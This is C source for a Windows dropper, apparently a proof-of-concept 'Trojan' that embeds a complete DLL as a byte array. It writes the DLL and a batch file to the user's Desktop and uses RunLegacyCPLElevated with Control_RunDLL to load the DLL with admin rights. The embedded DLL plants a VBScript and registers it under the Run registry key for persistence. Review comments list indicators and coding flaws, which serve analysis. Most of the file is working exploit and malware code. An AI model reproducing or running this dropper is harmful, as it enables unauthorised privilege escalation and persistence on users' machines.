#include <windows.h>
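/*
 * Embedded payload: 3072 bytes holding a complete 32-bit PE DLL (MZ/PE headers,
 * sections .text, .rdata, .data and .reloc). WinMain writes it to disk unchanged.
 * Strings readable in the bytes below, usable as static indicators:
 *   - export table: module name "Trojan_dll.dll", one exported name "CPIApplet"
 *   - kernel32.dll imports: GetWindowsDirectoryA, lstrcatA, lstrlenA,
 *     CreateFileA, WriteFile, CloseHandle, ExitProcess
 *   - advapi32.dll imports: RegOpenKeyExA, RegSetValueExA, RegCloseKey
 *   - data: "\VistaTrojan.vbs", "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
 *     "VistaTrojan", and a one-line VBScript msgbox text
 * Taken together, the DLL appears to write a .vbs file under the Windows
 * directory and register it under a Run key for persistence. This is inferred
 * from the imports and strings, not from a full disassembly.
 */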
char TrojanCode[] = {
0x4D,0x5A,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xFF,0xFF,0x00,0x00,0xB8,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x0E,0x1F,0xBA,0x0E,0x00,0xB4,0x09,0xCD,0x21,0xB8,0x01,0x4C,0xCD,0x21,0x54,0x68,
0x69,0x73,0x20,0x70,0x72,0x6F,0x67,0x72,0x61,0x6D,0x20,0x63,0x61,0x6E,0x6E,0x6F,0x74,0x20,0x62,0x65,
0x20,0x72,0x75,0x6E,0x20,0x69,0x6E,0x20,0x44,0x4F,0x53,0x20,0x6D,0x6F,0x64,0x65,0x2E,0x0D,0x0D,0x0A,
0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x68,0x17,0x6F,0xFB,0x2C,0x76,0x01,0xA8,0x2C,0x76,0x01,0xA8,
0x2C,0x76,0x01,0xA8,0xD0,0x56,0x13,0xA8,0x2D,0x76,0x01,0xA8,0xA2,0x69,0x12,0xA8,0x3C,0x76,0x01,0xA8,
0x52,0x69,0x63,0x68,0x2C,0x76,0x01,0xA8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x45,0x00,0x00,0x4C,0x01,0x04,0x00,
0x3D,0xB5,0x4D,0x46,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xE0,0x00,0x0E,0x21,0x0B,0x01,0x05,0x0C,
0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x10,0x00,0x00,
0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00,0x04,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x00,0x00,0x00,0x04,0x00,0x00,
0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x10,0x00,
0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x50,0x21,0x00,0x00,0x4B,0x00,0x00,0x00,
0x30,0x20,0x00,0x00,0x3C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x38,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x30,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x2E,0x74,0x65,0x78,0x74,0x00,0x00,0x00,0x04,0x01,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00,
0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x60,
0x2E,0x72,0x64,0x61,0x74,0x61,0x00,0x00,0x9B,0x01,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x02,0x00,0x00,
0x00,0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,
0x2E,0x64,0x61,0x74,0x61,0x00,0x00,0x00,0xD7,0x01,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x02,0x00,0x00,
0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,
0x2E,0x72,0x65,0x6C,0x6F,0x63,0x00,0x00,0x4E,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x02,0x00,0x00,
0x00,0x0A,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x42,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x55,0x8B,0xEC,0x68,0x04,0x01,0x00,0x00,0x68,0x2F,0x30,0x00,0x10,0xE8,0xC8,0x00,
0x00,0x00,0x68,0x1E,0x30,0x00,0x10,0x68,0x2F,0x30,0x00,0x10,0xE8,0xC5,0x00,0x00,0x00,0x6A,0x00,0x68,
0x80,0x00,0x00,0x00,0x6A,0x02,0x6A,0x00,0x6A,0x02,0x68,0x00,0x00,0x00,0x40,0x68,0x2F,0x30,0x00,0x10,
0xE8,0x91,0x00,0x00,0x00,0x83,0xF8,0xFF,0x75,0x07,0x6A,0x00,0xE8,0x8B,0x00,0x00,0x00,0x93,0x68,0x71,
0x31,0x00,0x10,0xE8,0x98,0x00,0x00,0x00,0x92,0x6A,0x00,0x68,0xD5,0x31,0x00,0x10,0x52,0x68,0x71,0x31,
0x00,0x10,0x53,0xE8,0x78,0x00,0x00,0x00,0x53,0xE8,0x5A,0x00,0x00,0x00,0x68,0x33,0x31,0x00,0x10,0x68,
0x06,0x00,0x02,0x00,0x6A,0x00,0x68,0x37,0x31,0x00,0x10,0x68,0x02,0x00,0x00,0x80,0xE8,0x6F,0x00,0x00,
0x00,0x0B,0xC0,0x74,0x07,0x6A,0x00,0xE8,0x40,0x00,0x00,0x00,0x68,0x2F,0x30,0x00,0x10,0xE8,0x4E,0x00,
0x00,0x00,0x91,0x51,0x68,0x2F,0x30,0x00,0x10,0x6A,0x01,0x6A,0x00,0x68,0x65,0x31,0x00,0x10,0xFF,0x35,
0x33,0x31,0x00,0x10,0xE8,0x45,0x00,0x00,0x00,0xFF,0x35,0x33,0x31,0x00,0x10,0xE8,0x2E,0x00,0x00,0x00,
0xC9,0xC2,0x10,0x00,0xFF,0x25,0x28,0x20,0x00,0x10,0xFF,0x25,0x1C,0x20,0x00,0x10,0xFF,0x25,0x18,0x20,
0x00,0x10,0xFF,0x25,0x10,0x20,0x00,0x10,0xFF,0x25,0x24,0x20,0x00,0x10,0xFF,0x25,0x20,0x20,0x00,0x10,
0xFF,0x25,0x14,0x20,0x00,0x10,0xFF,0x25,0x04,0x20,0x00,0x10,0xFF,0x25,0x00,0x20,0x00,0x10,0xFF,0x25,
0x08,0x20,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1E,0x21,0x00,0x00,
0x10,0x21,0x00,0x00,0x2E,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0xC6,0x20,0x00,0x00,0xF6,0x20,0x00,0x00,
0xB8,0x20,0x00,0x00,0xAA,0x20,0x00,0x00,0xEA,0x20,0x00,0x00,0xDE,0x20,0x00,0x00,0x9C,0x20,0x00,0x00,
0x00,0x00,0x00,0x00,0x7C,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x21,0x00,0x00,
0x10,0x20,0x00,0x00,0x6C,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x21,0x00,0x00,
0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x1E,0x21,0x00,0x00,0x10,0x21,0x00,0x00,0x2E,0x21,0x00,0x00,0x00,0x00,0x00,0x00,
0xC6,0x20,0x00,0x00,0xF6,0x20,0x00,0x00,0xB8,0x20,0x00,0x00,0xAA,0x20,0x00,0x00,0xEA,0x20,0x00,0x00,
0xDE,0x20,0x00,0x00,0x9C,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x1A,0x00,0x43,0x6C,0x6F,0x73,0x65,0x48,
0x61,0x6E,0x64,0x6C,0x65,0x00,0x30,0x00,0x43,0x72,0x65,0x61,0x74,0x65,0x46,0x69,0x6C,0x65,0x41,0x00,
0x80,0x00,0x45,0x78,0x69,0x74,0x50,0x72,0x6F,0x63,0x65,0x73,0x73,0x00,0x62,0x01,0x47,0x65,0x74,0x57,
0x69,0x6E,0x64,0x6F,0x77,0x73,0x44,0x69,0x72,0x65,0x63,0x74,0x6F,0x72,0x79,0x41,0x00,0x00,0x9E,0x02,
0x57,0x72,0x69,0x74,0x65,0x46,0x69,0x6C,0x65,0x00,0xB5,0x02,0x6C,0x73,0x74,0x72,0x63,0x61,0x74,0x41,
0x00,0x00,0xBF,0x02,0x6C,0x73,0x74,0x72,0x6C,0x65,0x6E,0x41,0x00,0x00,0x6B,0x65,0x72,0x6E,0x65,0x6C,
0x33,0x32,0x2E,0x64,0x6C,0x6C,0x00,0x00,0x80,0x01,0x52,0x65,0x67,0x43,0x6C,0x6F,0x73,0x65,0x4B,0x65,
0x79,0x00,0x99,0x01,0x52,0x65,0x67,0x4F,0x70,0x65,0x6E,0x4B,0x65,0x79,0x45,0x78,0x41,0x00,0xAE,0x01,
0x52,0x65,0x67,0x53,0x65,0x74,0x56,0x61,0x6C,0x75,0x65,0x45,0x78,0x41,0x00,0x00,0x61,0x64,0x76,0x61,
0x70,0x69,0x33,0x32,0x2E,0x64,0x6C,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x3D,0xB5,0x4D,0x46,
0x00,0x00,0x00,0x00,0x82,0x21,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x78,0x21,0x00,0x00,0x7C,0x21,0x00,0x00,0x80,0x21,0x00,0x00,0x00,0x10,0x00,0x00,0x91,0x21,0x00,0x00,
0x00,0x00,0x54,0x72,0x6F,0x6A,0x61,0x6E,0x5F,0x64,0x6C,0x6C,0x2E,0x64,0x6C,0x6C,0x00,0x43,0x50,0x49,
0x41,0x70,0x70,0x6C,0x65,0x74,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x43,0x6F,0x64,0x65,0x64,0x20,0x62,0x79,0x20,0x5B,0x57,0x61,
0x72,0x47,0x61,0x6D,0x65,0x2F,0x64,0x6F,0x6F,0x6D,0x72,0x69,0x64,0x65,0x72,0x7A,0x5D,0x00,0x5C,0x56,
0x69,0x73,0x74,0x61,0x54,0x72,0x6F,0x6A,0x61,0x6E,0x2E,0x76,0x62,0x73,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x53,
0x4F,0x46,0x54,0x57,0x41,0x52,0x45,0x5C,0x4D,0x69,0x63,0x72,0x6F,0x73,0x6F,0x66,0x74,0x5C,0x57,0x69,
0x6E,0x64,0x6F,0x77,0x73,0x5C,0x43,0x75,0x72,0x72,0x65,0x6E,0x74,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,
0x5C,0x52,0x75,0x6E,0x00,0x56,0x69,0x73,0x74,0x61,0x54,0x72,0x6F,0x6A,0x61,0x6E,0x00,0x6D,0x73,0x67,
0x62,0x6F,0x78,0x20,0x22,0x54,0x68,0x69,0x73,0x20,0x69,0x73,0x20,0x61,0x20,0x73,0x69,0x6D,0x70,0x6C,
0x65,0x20,0x50,0x6F,0x43,0x20,0x73,0x68,0x6F,0x77,0x69,0x6E,0x67,0x20,0x79,0x6F,0x75,0x20,0x68,0x6F,
0x77,0x20,0x74,0x6F,0x20,0x67,0x65,0x74,0x20,0x61,0x64,0x6D,0x69,0x6E,0x20,0x72,0x69,0x67,0x68,0x74,
0x73,0x21,0x22,0x2C,0x2C,0x22,0x43,0x6F,0x64,0x65,0x64,0x20,0x62,0x79,0x20,0x5B,0x57,0x61,0x72,0x47,
0x61,0x6D,0x65,0x2F,0x64,0x6F,0x6F,0x6D,0x72,0x69,0x64,0x65,0x72,0x7A,0x5D,0x22,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x10,0x00,0x00,0x38,0x00,0x00,0x00,0x09,0x30,0x13,0x30,0x18,0x30,0x34,0x30,0x4B,0x30,0x58,0x30,
0x5E,0x30,0x6F,0x30,0x7B,0x30,0x95,0x30,0xA1,0x30,0xAA,0x30,0xB0,0x30,0xBB,0x30,0xCA,0x30,0xD0,0x30,
0xD6,0x30,0xDC,0x30,0xE2,0x30,0xE8,0x30,0xEE,0x30,0xF4,0x30,0xFA,0x30,0x00,0x31,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
/**************************************/
/*
 * Dropper entry point. None of the four WinMain parameters is read.
 *
 * Behaviour visible in this function, in order:
 *   1. Reads the "Desktop" value from the current user's
 *      Explorer\Shell Folders registry key.
 *   2. Writes the embedded TrojanCode bytes to <Desktop>\Trojan_dll.dll.
 *   3. Writes <Desktop>\go2admin.bat containing a single
 *      RunLegacyCPLElevated ... Control_RunDLL command line that names the DLL.
 *   4. Launches the batch file through ShellExecute and exits with code 1.
 * Every failure path calls ExitProcess(0), so the function never returns.
 *
 * Artifacts for detection and triage: the two files created on the Desktop,
 * the batch file opened via ShellExecute, and the RunLegacyCPLElevated command
 * line written into it (presumably seen as a process start when the batch
 * runs). Whether an elevation prompt is shown cannot be told from this file.
 */
int __stdcall WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
HKEY hKey;
/* len is the in/out byte count for RegQueryValueEx; writtenBytes is filled by WriteFile and never checked */
DWORD len = MAX_PATH,writtenBytes;
/* path: Desktop dir, later the DLL path; bat: batch file path; cmd: batch file contents */
char path[MAX_PATH],cmd[384],bat[MAX_PATH];
HANDLE trfd = NULL,batfd = NULL;
/* locate the current user's Desktop folder through the per-user Shell Folders key */
if(RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders",
0,KEY_QUERY_VALUE,&hKey) != ERROR_SUCCESS)
{
ExitProcess(0);
}
/* NOTE(review): the value type is not requested (NULL), so nothing here confirms
   the data is a NUL-terminated string before it is used as one below */
if(RegQueryValueEx(hKey,"Desktop",0,NULL,path,&len) != ERROR_SUCCESS)
{
/* hKey is still open on this path; the process exits right away */
ExitProcess(0);
}
RegCloseKey(hKey);
/* write the dll */
/* NOTE(review): lstrcpy/lstrcat are unbounded; a Desktop path close to MAX_PATH
   would overflow path[] or bat[] when the file names are appended */
lstrcpy(bat,path);
lstrcat(path,"\\Trojan_dll.dll");
lstrcat(bat,"\\go2admin.bat");
/* CREATE_ALWAYS replaces any existing file of the same name */
if((trfd = CreateFile(path,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,
CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL)) == INVALID_HANDLE_VALUE)
{
ExitProcess(0);
}
/* 3072 is hard-coded and equals the number of initialisers in TrojanCode;
   the WriteFile result is ignored, so a short or failed write goes unnoticed */
WriteFile(trfd,TrojanCode,3072,&writtenBytes,NULL);
CloseHandle(trfd);
/* create the batch file next to the DLL */
if((batfd = CreateFile(bat,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,
CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL)) == INVALID_HANDLE_VALUE)
{
ExitProcess(0);
}
/* the batch file's only line: RunLegacyCPLElevated asked to load the dropped DLL
   through shell32's Control_RunDLL.
   NOTE(review): sprintf is unbounded, and no <stdio.h> include is visible in this file */
sprintf(cmd,"RunLegacyCPLElevated shell32,Control_RunDLL \"%s\",\"Boof\"",path);
/* written without a trailing newline or NUL (lstrlen bytes only); result unchecked */
WriteFile(batfd,cmd,lstrlen(cmd),&writtenBytes,NULL);
CloseHandle(batfd);
/* I use an external batch file coz a direct CreateProcess() didn't work in my tests */
/* the batch file is opened with a visible window (SW_SHOW); the return value is ignored */
ShellExecute(NULL,"open",bat,NULL,NULL,SW_SHOW);
ExitProcess(1);
}